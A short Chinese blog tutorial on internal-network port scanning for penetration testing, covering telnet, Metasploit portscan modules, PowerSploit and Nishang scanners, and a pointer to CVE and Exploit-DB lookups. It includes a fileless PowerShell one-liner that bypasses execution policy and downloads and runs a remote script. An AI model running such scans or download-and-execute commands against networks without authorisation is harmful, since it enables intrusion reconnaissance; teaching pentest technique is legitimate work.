内网渗透测试之域内端口扫描 port scanning of intranet pentest in domain https://www.cnblogs.com/iAmSoScArEd/p/13869632.html 来自我超怕的
通过端口扫描主要用于得到端口的banner信息、端口上运行的服务、发现常见应用的默认端口。
1、利用telnet进行端口扫描
快速探测主机是否存在常见的高危端口
telnet 192.168.0.2 22 telnet 192.168.0.2 3306
2、Metasploit端口扫描
Metasploit渗透测试利器,提供了很多漏洞利用、扫描功能。
auxiliary/scanner/portscan/ack ACK防火墙扫描
auxiliary/scanner/portscan/ftpbounce FTP跳端口扫描
auxiliary/scanner/portscan/syn SYN端口扫描
auxiliary/scanner/portscan/tcp TCP端口扫描
auxiliary/scanner/portscan/xmas TCP"XMas"端口扫描
使用auxiliary/scanner/portscan/tcp模块示例
use auxiliary/scanner/portscan/tcp show options set ports 1-1024 set RHOSTS 192.168.0.1 set THREADS 10 run
3、PowerSploit的Invoke-portscan.ps1
无文件形式扫描:
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,80,8080,3389' -oA c:ProgramDataip_info"
4、Nishang的Invoke-PortScan模块
获取帮助
Get-Help Invoke-PortScan -full
详细代码:https://github.com/samratashok/nishang/blob/master/Scan/Invoke-PortScan.ps1
StartAddress 扫描范围开始地址
EndAddress 扫描范围结束地址
ScanPort 进行端口扫描
Port 指定扫描端口,不指定port,则默认端口为 21,22,23,53,69,71,80,98,110,139,111, 389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389, 5801,5900,5555,5901
TimeOut 设置超时时间
-ResolveHost 解析主机名
扫描存活主机及端口并解析主机名
使用方式
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort
5、Nmap
https://www.cnblogs.com/iAmSoScArEd/p/10585863.html
6、端口利用
具体信息及利用速查 :https://www.cnblogs.com/iAmSoScArEd/p/10564262.html
根据banner信息,可以在CVE库对指定服务、版本进行漏洞查询
或使用Exploit-DB查询PoC、EXP